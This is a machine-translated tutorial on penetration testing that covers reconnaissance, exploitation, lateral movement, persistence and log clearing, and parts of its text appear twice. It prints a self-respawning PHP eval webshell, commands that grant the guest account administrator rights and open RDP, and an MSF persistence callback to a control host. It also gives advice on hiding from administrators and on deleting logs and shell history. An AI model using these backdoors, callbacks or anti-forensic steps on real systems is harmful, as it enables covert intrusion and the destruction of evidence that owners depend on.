1. Determine the target
Penetration testing is divided into white box testing and black box testing
- White box testing is to infiltrate the target website while knowing the source code and some other information, similar to code analysis
- Black box testing is to only tell us the url of this website, nothing else, and then let you infiltrate, simulating the penetration of hackers into the website
Black box testing, we only know the URL of the website
Generally speaking, the basic process of penetration testing is as follows:
- Determine the target
- collect message
- Vulnerability detection
- exploit getshell
- Intranet forwarding
- Intranet penetration
- trace removal
- Write a penetration test report
2. Information collection
1. Host scan
Nmap: A powerful network scanning and host detection tool that can be used for information gathering, enumeration, vulnerability detection and security scanning.
Wireshark: A tool for capturing packets and analyzing network traffic, which can be used to monitor and debug network communication.
Goby: A new type of vulnerability scanning platform that can quickly discover and exploit various vulnerabilities, and can also be linked with other tools such as Xray and MSF.
2. Port scanning
22——>ssh weak password
80——>HTTP service
873——>rsync unauthorized access vulnerability
3306——>mysql weak password
6379——>redis unauthorized access vulnerability
Port scanning tools include nmap, nikto
In kali, you can use some commands to check whether a port is open, for example:
netstat -lnt: View the currently open ports of Kali.
lsof -i: directly output the open ports.
nmap: Scan for open ports on the target host
3. Website sensitive directories and files
The tools to detect the background directory of the target website are: wwwscan, Yujian, dirsearch
Scan the website directory structure to see if the directory can be traversed, or sensitive files are leaked
- Background directory: weak password, universal password, blasting
- Installation package: get database information, even website source code
- Upload directory: truncate, upload pictures, etc.
- mysql management interface: weak password, blasting, universal password, and then take off your pants, or even get a shell
- Installation page: can be installed twice to bypass
- phpinfo: will expose all kinds of information you configure
- Editor: fck, ke, etc.
- IIS short file utilization: the conditions are relatively harsh windows, apache, etc.
robots.txt file
Specifies the directories in the website that do not want to be accessed by robots. In this way, part or all of the content of our website may not be included by search engines, or the search engines may only include specified content.
4. Side station and C-segment scanning
Side station and C-segment scanning are two methods of information collection, which are used to find other websites or servers that may have vulnerabilities in the target website or server.
Side sites refer to other websites on the same server as the target website1. If the target website has no loopholes, you can first attack the side station, then elevate the privilege to get the server authority, and then attack the target website 2. Commonly used side station query tools include Imperial Sword, bing.com, etc. 2 .
The C segment refers to other servers in the same C segment as the target server IP. For example, if the IP of the target server is 192.168.1.100, then the segment C where it is located is 192.168.1.*1. Find the hosts in segment C, and use them as a springboard to attack the target host. Commonly used C-segment scanning tools include Nmap, Masscan, etc.
5. Website vulnerability scanning
Website vulnerability scanning is a method to detect whether a website has security vulnerabilities. It can detect vulnerabilities by sending Payload, or perform aggressive security vulnerability scanning by simulating hackers' attack methods. Commonly used website vulnerability scanning tools include Acunetix Web Vulnerability Scanner (AWVS), Nikto, Nmap, etc.
6. Website Fingerprinting
Website fingerprinting is the process of identifying the behavior of a web browsing client, specifically the web pages she is visiting, by observing traffic traces. Website fingerprinting can be performed in the following ways: MD5 of a specific file, keywords contained in normal or error pages, keyword matching of request header information, keywords contained in some URLs, identification of development language, etc. Commonly used website fingerprinting tools include ZoomEye, WhatWeb, etc.
7. Online collection of company sensitive information
8. Collection of domain name information
Domain name information collection refers to obtaining the domain name, subdomain name, IP address and other information of the target website or host through various methods for further penetration testing. There are several ways to collect domain name information:
Blasting: use tools such as dnsmap to conduct dictionary attacks on the target domain name, and try to discover subdomain names.
Search engine: use tools such as theharvester or directly enter relevant keywords in the search engine, and use the index function of the search engine to find subdomains.
Domain Transfer: Use tools such as fierce or dig to perform DNS zone transfer requests for the target domain name. If the target server is not properly configured, all subdomain names may be leaked.
Whois query: Use websites or tools such as whois to perform a Whois query on the target domain name, and you can obtain information such as the registrant, registrar, and registration time.
Judging the IP corresponding to the domain name: First, we need to judge whether there is a CDN for the domain name. We can go to the online CDN to query the website: Ping servers in multiple locations, website speed test - webmaster tools. If the number of ips found in the query is more than one, it means that the ip address is not the real server address. From my experience, if there are 2 or 3 addresses, and these addresses are from different operators in the same area, it is very likely that these addresses are the egress addresses of the server. Provide Internet access through NAT mapping of different operators, and use several different operators at the same time for load balancing and hot backup. If there are multiple ip addresses, and these ip addresses are distributed in different regions, it can basically be concluded that CDN is used.
Three vulnerability detection
- SQL injection
- XSS Cross Site Scripting
- CSRF cross-site request forgery
- XXE vulnerability
- SSRF server request forgery vulnerability
- file contains bug
- File Upload Vulnerability
- File Parsing Vulnerabilities
- Remote Code Execution Vulnerabilities
- CORS cross domain resource sharing vulnerability
- Unauthorized Access Vulnerability
- Directory Browsing Vulnerabilities and Arbitrary File Read/Download Vulnerabilities
- struts2 vulnerability
- JAVA deserialization vulnerability
Website Vulnerability Scanning Tool
- AWVS
- AppScan
- Owasp-Zap
- Nessus
Four exploits
Different vulnerabilities have different exploitation tools. In many cases, it is difficult for us to obtain the webshell of a website through a vulnerability. We often need to combine several vulnerabilities to obtain the webshell. Commonly used exploit tools are as follows:
SQL injection --> Sqlmap
XSS cross-site scripting --> Beef-XSS
Packet capture tool --> Burpsuite tool, Fidder packet capture software
File upload vulnerability, if uploading a vulnerability, we usually upload a one-sentence Trojan horse, and then get webshell, portal --> Webshell and a one-sentence Trojan horse
However, after obtaining the webshell, the general authority is very low, so we need to escalate the authority,
You can choose to rebound a MSF-type shell privilege escalation: the use of Metasploit Framework (MSF), Msfvenonm generates a backdoor Trojan horse.
It is also possible to rebound a CobaltStrike type shell: the use of penetration testing artifact Cobalt Strike.
Linkage between MSF and CobaltStrike is also possible: MSF and CobaltStrike linkage can also use other privilege escalation: Windows privilege escalation, Linux privilege escalation.
Five intranet forwarding
If we have obtained the authority of the website through the Webshell and want to obtain further information about the host, we can replace the Webshell with the MSF shell. We only need to generate a Trojan horse and execute it in the kitchen knife to get a MSF type shell.
If we want to detect the information of other hosts on the intranet, we need to use intranet forwarding. Because we cannot directly communicate with the intranet host, we need to use the web server that has obtained permission to interact with the intranet host.
Six Intranet Horizontal Penetration
After we take down the external network server and enter the system, we should try our best to find useful information from the server.
For the windows system, we should look through the folders more, and there may be unexpected gains. Many people are used to storing things that are easy to forget such as account passwords in notepads or on the desktop. We can also look for database connection files to see sensitive information such as database connection account passwords. When we get the account password of the windows system, or create a new user ourselves, in order not to be discovered by the administrator and not to affect the normal operation of the server. We try not to log in with remote desktop. Because using the remote desktop is too noisy, if the administrator is also logging in, you will squeeze him out with the remote desktop login, and you will be kicked out by the administrator soon. For situations where remote desktop login is very necessary, we try not to create a new user to log in. We can activate the guest user, add it to the administrators group, and log in as the guest user. After RDP remote login, we can see what software is on other users' desktops and other folders. The targets we are looking for include the following.
FTP-related software, database-related software, open the browser to check the history, whether there is a user password saved, and use tools to check the saved password of the browser. Use the account password found on the host to make a dictionary, which may be used when blasting other machines in the intranet. the same set of passwords.
net user guest /active:yes #Activate guest user net localgroup administrators guest /add #Add guest user to net user guest password #Change guest user password REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections / t REG_DWORD /d 00000000 /f #Open port 3389
For Linux systems, we can view open ports, run services, and connect to intranet hosts. View folders, find database connection passwords, and more. In short, it is to collect more account passwords, which is very useful when blasting on the intranet.
After establishing a tunnel to connect to the intranet, the first thing to do is to discover assets on the intranet. But judging the surviving network segment of the intranet is a big problem. The network segments 10.0.0.0/8, 172.16.0.0/16, and 192.168.0.0/24 may exist in the intranet at the same time. This requires a scanner to detect. Scanning via proxy is not recommended to use nmap. If you scan through a proxy locally and use a graphical interface, you can use tools such as RouterScan, Yujian high-speed TCP full-port scanner, and IIS_Scanner to scan. But pay attention to lower the thread to avoid the proxy crash. If using the command line
Five intranet forwarding
If we have obtained the authority of the website through the Webshell and want to obtain further information about the host, we can replace the Webshell with the MSF shell. We only need to generate a Trojan horse and execute it in the kitchen knife to get a MSF type shell. If we want to detect the information of other hosts on the intranet, we need to use intranet forwarding. Because we cannot directly communicate with the intranet host, we need to use the web server that has obtained permission to interact with the intranet host.
Six Intranet Horizontal Penetration
After we take down the external network server and enter the system, we should try our best to find useful information from the server.
For the windows system, we should look through the folders more, and there may be unexpected gains. Many people are used to storing things that are easy to forget such as account passwords in notepads or on the desktop. We can also look for database connection files to see sensitive information such as database connection account passwords.
When we get the account password of the windows system, or create a new user ourselves, in order not to be discovered by the administrator and not to affect the normal operation of the server. We try not to log in with remote desktop. Because using remote desktop is too noisy, if the administrator is also logging in, you will squeeze him out with remote desktop login, and you will be kicked out by the administrator soon. For situations where remote desktop login is very necessary, we try not to create a new user to log in.
We can activate the guest user, add it to the administrators group, and log in as the guest user. After RDP remote login, we can see what software is on other users' desktops and other folders. The targets we are looking for include the following.
1. FTP-related software, database-related software, open the browser to check the history, whether there is a user password saved, and use tools to check the saved password of the browser. Use the account password found on the host to make a dictionary, and when blasting other machines in the intranet Probably the same set of ciphers.
net user guest /active:yes #激活guest用户
net localgroup administrators guest /add #将guest用户添加到
net user guest 密码 #更改guest用户密码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开启3389端口
For Linux systems, we can view open ports, run services, and connect to intranet hosts. View folders, find database connection passwords, and more. In short, it is to collect more account passwords, which is very useful when blasting on the intranet. After establishing a tunnel to connect to the intranet, the first thing to do is to discover assets on the intranet. But judging the surviving network segment of the intranet is a big problem. The network segments 10.0.0.0/8, 172.16.0.0/16, and 192.168.0.0/24 may exist in the intranet at the same time. This requires a scanner to detect. Scanning via proxy is not recommended to use nmap.
If you scan through a proxy locally and use a graphical interface, you can use tools such as RouterScan, Yujian high-speed TCP full-port scanner, and IIS_Scanner to scan. But pay attention to lower the thread to avoid the proxy crash.
If you use a command-line scanner, you can use the S-scanner. After scanning the intranet assets and port openness, for port 445, you can send a wave of MS17_010. But pay attention to calling 445 through a proxy, which is different from the previous ones. Portal ——> MS17-010 of intranet penetration. For port 3389, you can hit a wave of CVE-2019-0708, portal --> CVE-2019-0708 remote desktop vulnerability reappears. For ports such as 1433/3306/6379, you can try to blast, and the success rate of using the account password collected before is higher
Authority maintenance
After obtaining the permission of the target host, it is very likely that we could not obtain what we wanted at that time, and we needed to do a long-term latency, especially in the internal network penetration, which required long-term information collection. At this time, authority maintenance is very important. We need to maintain the existing permissions we have been given.
Web back door
1: Hide the backdoor file (set the file as hidden)
2: Undead horse, the script creates test.php to the server every 5 seconds, and writes a sentence to avoid killing the Trojan horse. Combined with the attrib command to hide files, it is better to create a backdoor.
<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>
3: The 404 page hides the backdoor, or inserts the backdoor code in other self-contained files
Note: The above several backdoor methods can be detected by tools such as D-Shield
Windows system
1: Create a hidden user, add $ after the user name
2: Place the Trojan horse file in the startup directory, as long as the target machine restarts, it will connect back to our remote control
3: The persistence module in MSF, executing commands can make the target machine automatically connect to the remote control at regular intervals. but easy to spot
#反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
run persistence -X -i 5 -p 8888 -r 192.168.10.27
#然后它就在目标机新建了这个文件:C:\Windows\TEMP\CJzhFlNOWa.vbs ,并把该服务加入了注册表中,只要开机就会启动
4: In the domain environment, find a way to obtain the hash of the krbtgt user, which can be used for pass-the-ticket attacks. And generally the user's password does not change frequently.
5: shift back door
6: Remote Desktop Session Hijacking
Linux system
1: SSH backdoor
2: crontab timing task
3: SSH public key
4: Create a user with SUID=0
Seven Traces Clear
When we have achieved our goal, sometimes it is just to hack into the website and hang black pages to show off; or leave a back door on the website as a broiler, and go for a stroll when we are free; or hang a mining Trojan horse; but everyone Don't do this, it's illegal!
I'm just here to teach you how to remove some of the traces we left after infiltrating, but it can't be completely removed. It is impossible to completely remove the traces of intrusion! The main reason is to increase the time cost and labor cost for the administrator to discover the intruder. As long as the administrator wants to check, no matter how you clear it, you can still find it.
The most important thing is to hide your identity. The best way is to hang an agent before the infiltration, and then remove the traces after the infiltration.
Windows system
1: If it is a windows system, you can use the clearev command in MSF to clear the traces
2: If 3389 has logged in remotely, you need to clear the traces of mstsc
3: Execute the command to clear the log:
del %WINDR%\* .log /a/s/q/f
4: If it is a web application, find the web log file and delete it
Linux system
1: If it is a Linux system, after obtaining the permission, execute the following command, and the entered command will not be recorded
export HISTFILE=/dev/null export HISTSIZE=0
2: Delete the log files in the /var/log directory
3: If it is a web application, find the web log file and delete it
8. Writing a penetration testing report
After completing the penetration test, we need to write a penetration test report for this penetration test. Clearly write where there are vulnerabilities and how to fix them. In order for webmasters to patch these vulnerabilities and risks based on our penetration testing reports.